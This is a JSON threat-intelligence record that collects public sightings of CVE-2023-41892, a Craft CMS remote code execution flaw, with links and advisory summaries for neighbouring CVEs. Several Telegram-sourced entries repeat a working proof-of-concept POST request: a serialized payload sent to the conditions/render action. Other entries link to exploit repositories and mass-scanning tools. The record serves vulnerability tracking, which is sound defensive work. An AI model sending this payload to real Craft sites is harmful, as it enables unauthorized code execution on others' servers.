{"vulnerability": "CVE-2023-4189", "sightings": [{"uuid": "9c880f4e-dca8-4dc6-94b7-1cf772f487bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "ef20858a-44d1-4f62-a38e-50d4aec65bb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:56.000000Z"}, {"uuid": "174818d3-5eeb-4dc7-8f65-06bd6950dd57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114410089366436743", "content": "", "creation_timestamp": "2025-04-27T13:10:21.284519Z"}, {"uuid": "667fd6cb-4059-4290-92da-ecb45c0a78d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://gist.github.com/alon710/5886ffebd9bdbd338fc1178cfafd37fe", "content": "", "creation_timestamp": "2026-01-24T21:30:29.000000Z"}, {"uuid": "03a30804-efbc-43a2-82e0-57b8ef6f9dbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:01.000000Z"}, {"uuid": "88426ef5-2672-4920-892b-11609cd7b0ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb", "content": "", "creation_timestamp": "2023-12-22T10:26:48.000000Z"}, {"uuid": "cca4602e-e97a-4c40-bc37-77d36b31a010", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://gist.github.com/alon710/ba0356b10ddaaccd4ba9c4e638dd6fdf", "content": "", "creation_timestamp": "2026-01-24T21:30:28.000000Z"}, {"uuid": "444cca1b-9cc5-4a10-af86-20fed31600e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13769", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32432\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L)\n\ud83d\udd39 Description: Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector. This issue has been patched in versions 3.9.15, 4.14.15, and 5.6.17, and is an additional fix for CVE-2023-41892.\n\ud83d\udccf Published: 2025-04-25T15:04:06.272Z\n\ud83d\udccf Modified: 2025-04-29T03:55:14.713Z\n\ud83d\udd17 References:\n1. https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3\n2. https://github.com/craftcms/cms/commit/e1c85441fa47eeb7c688c2053f25419bc0547b47\n3. https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical\n4. https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical\n5. https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5617---2025-04-10-critical", "creation_timestamp": "2025-04-29T04:11:16.000000Z"}, {"uuid": "729b47f7-5bb3-4b34-8338-32b81e6058da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://gist.github.com/alon710/b5ac76215ce9d95cc59553712b814232", "content": "", "creation_timestamp": "2026-01-24T22:42:30.000000Z"}, {"uuid": "d87a2f09-0a7c-4bc1-a694-bc3b8fd83558", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6678", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aA Craft CMS vulnerability that allows Remote Code Execution (RCE).\nURL\uff1ahttps://github.com/acesoyeo/CVE-2023-41892\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-02-26T18:36:05.000000Z"}, {"uuid": "d8cbf05b-755a-4380-95ad-3525ef204f99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5295", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aMass check CVE-2023-41892 - Craft CMS Remote Code Execution (RCE)\nURL\uff1ahttps://github.com/rajat4722/Bug-Bounty-Hacktoberfest-2023\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2023-10-06T01:58:24.000000Z"}, {"uuid": "f92478fb-cc2a-4cf3-8547-9d112e6cdf23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5294", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aMass check CVE-2023-41892 - Craft CMS Remote Code Execution (RCE)\nURL\uff1ahttps://github.com/zaenhaxor/CVE-2023-41892\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-10-06T01:23:11.000000Z"}, {"uuid": "c57fd207-238f-4cf9-acd9-046f07a8d95d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/YouPentest/9864", "content": "\u200aCraft CMS CVE-2023-41892 Vulnerability Exploitation | POC\n\nhttps://www.youtube.com/watch?v=iR39Kaez_eM", "creation_timestamp": "2024-05-11T09:02:34.000000Z"}, {"uuid": "3d7382b7-b9c6-4f2d-85a5-1899b90dc524", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "Telegram/6lKByArH9FS3kGV0eBc5AxMt53ZNy3FxF1pgZuVY2NXgTHI", "content": "", "creation_timestamp": "2025-08-21T15:00:06.000000Z"}, {"uuid": "9aad44fd-804d-4bf3-920e-fb758d979001", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "Telegram/tSoOD7lIoEkTLn5qIgH1mN18Q4Br_c6j05ucV-ly2IMxmQ", "content": "", "creation_timestamp": "2024-07-24T07:42:05.000000Z"}, {"uuid": "e507e795-7efc-48d1-83ae-4a5aabb8afcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/11", "content": "CVE-2023-41892\n\nPOST /ConditionsController.php HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n \naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\",    \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n\nphpinfo\n\n#exploit #poc", "creation_timestamp": "2024-07-26T14:22:24.000000Z"}, {"uuid": "acb4a6dc-da38-4a42-97dd-8e72c96a94d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/14718", "content": "CVE-2023-41892\n\nPOST /ConditionsController.php HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n \naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\",    \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n\nphpinfo\n\n#exploit #poc", "creation_timestamp": "2024-07-24T08:07:49.000000Z"}, {"uuid": "9af6019d-141a-4fea-8c67-1537a3f5205c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1420", "content": "CVE-2023-41892\n\nPOST /ConditionsController.php HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n \naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\",    \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n\nphpinfo\n\n#exploit #poc", "creation_timestamp": "2024-07-24T08:07:49.000000Z"}, {"uuid": "d89b684e-76b8-445c-bc1f-51667efa1192", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://t.me/arpsyndicate/2173", "content": "#ExploitObserverAlert\n\nCVE-2023-41892\n\nDESCRIPTION: Exploit Observer has 10 entries related to CVE-2023-41892. Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector. Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.\n\nFIRST-EPSS: 0.206280000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-28T01:26:31.000000Z"}, {"uuid": "99d7e291-f44d-4bcd-8f47-d3c2c5d177e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41891", "type": "seen", "source": "https://t.me/cibsecurity/73184", "content": "\u203c CVE-2023-41891 \u203c\n\nFlyteAdmin is the control plane for Flyte responsible for managing entities and administering workflow executions. Prior to version 1.1.124, list endpoints on FlyteAdmin have a SQL vulnerability where a malicious user can send a REST request with custom SQL statements as list filters. The attacker needs to have access to the FlyteAdmin installation, typically either behind a VPN or authentication. Version 1.1.124 contains a patch for this issue.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-30T21:20:06.000000Z"}, {"uuid": "30a720e6-85c8-4dcb-a908-8232ebf0bbbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41893", "type": "seen", "source": "https://t.me/cibsecurity/72645", "content": "\u203c CVE-2023-41893 \u203c\n\nHome assistant is an open source home automation. The audit team\u00e2\u20ac\u2122s analyses confirmed that the `redirect_uri` and `client_id` are alterable when logging in. Consequently, the code parameter utilized to fetch the `access_token` post-authentication will be sent to the URL specified in the aforementioned parameters. Since an arbitrary URL is permitted and `homeassistant.local` represents the preferred, default domain likely used and trusted by many users, an attacker could leverage this weakness to manipulate a user and retrieve account access. Notably, this attack strategy is plausible if the victim has exposed their Home Assistant to the Internet, since after acquiring the victim\u00e2\u20ac\u2122s `access_token` the adversary would need to utilize it directly towards the instance to achieve any pertinent malicious actions. To achieve this compromise attempt, the attacker must send a link with a `redirect_uri` that they control to the victim\u00e2\u20ac\u2122s own Home Assistant instance. In the eventuality the victim authenticates via said link, the attacker would obtain code sent to the specified URL in `redirect_uri`, which can then be leveraged to fetch an `access_token`. Pertinently, an attacker could increase the efficacy of this strategy by registering a near identical domain to `homeassistant.local`, which at first glance may appear legitimate and thereby obfuscate any malicious intentions. This issue has been addressed in version 2023.9.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-20T07:35:08.000000Z"}, {"uuid": "46d62d79-a96a-4aba-92a7-f426cb50b199", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://t.me/arpsyndicate/2142", "content": "#ExploitObserverAlert\n\nCVE-2023-41892\n\nDESCRIPTION: Exploit Observer has 9 entries related to CVE-2023-41892. Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector. Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.\n\nFIRST-EPSS: 0.206280000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-24T03:13:06.000000Z"}, {"uuid": "4cb30370-2115-43e9-8c39-6404c084e266", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2036", "content": "https://github.com/acesoyeo/CVE-2023-41892\nA Craft CMS vulnerability that allows Remote Code Execution (RCE).\n\n#github #poc", "creation_timestamp": "2024-02-27T03:33:37.000000Z"}, {"uuid": "846cadbb-c1ef-47aa-9d54-e25fc0195973", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41890", "type": "seen", "source": "https://t.me/cibsecurity/70728", "content": "\u203c CVE-2023-41890 \u203c\n\nSustainsys.Saml2 library adds SAML2P support to ASP.NET web sites, allowing the web site to act as a SAML2 Service Provider. Prior to versions 1.0.3 and 2.9.2, when a response is processed, the issuer of the Identity Provider is not sufficiently validated. This could allow a malicious identity provider to craft a Saml2 response that is processed as if issued by another identity provider. It is also possible for a malicious end user to cause stored state intended for one identity provider to be used when processing the response from another provider. An application is impacted if they rely on any of these features in their authentication/authorization logic: the issuer of the generated identity and claims; or items in the stored request state (AuthenticationProperties). This issue is patched in versions 2.9.2 and 1.0.3. The `AcsCommandResultCreated` notification can be used to add the validation required if an upgrade to patched packages is not possible.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-19T18:29:29.000000Z"}, {"uuid": "0aba01f2-286b-48fb-88dd-80c443b3d268", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://t.me/cibsecurity/70423", "content": "\u203c CVE-2023-41892 \u203c\n\nCraft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector. Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-14T00:23:55.000000Z"}, {"uuid": "dc1c4bd0-b6e4-44b0-8155-1516ac83ad74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2844", "content": "CVE-2023-41892\n\nPOST /ConditionsController.php HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n \naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\",    \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n\nphpinfo\n\n#exploit #poc", "creation_timestamp": "2024-07-24T07:53:42.000000Z"}, {"uuid": "c46491d2-b5c6-46fb-b90a-e5a31b9b8b2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/9042", "content": "#exploit\n1. CVE-2023-4352:\nChrome Read-Only Property Overwrite\nhttps://packetstormsecurity.com/files/174669/Chrome-Read-Only-Property-Overwrite.html\n\n2. CVE-2023-37154:\nHacking Monitored Servers with check_by_ssh and Argument Injection\nhttps://joshua.hu/nagios-hacking-cve-2023-37154\n\n3. CVE-2023-41892:\nCraftCMS RCE\nhttps://blog.calif.io/p/craftcms-rce", "creation_timestamp": "2023-09-18T18:53:57.000000Z"}, {"uuid": "6fdf2ec7-3c17-4ba4-a118-4a643493cb6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "Telegram/P54oWrjIQ0srG3w1diPYq2BJvN7sj5tg3YtSdd5A32_mgjr9", "content": "", "creation_timestamp": "2024-07-25T22:50:29.000000Z"}]}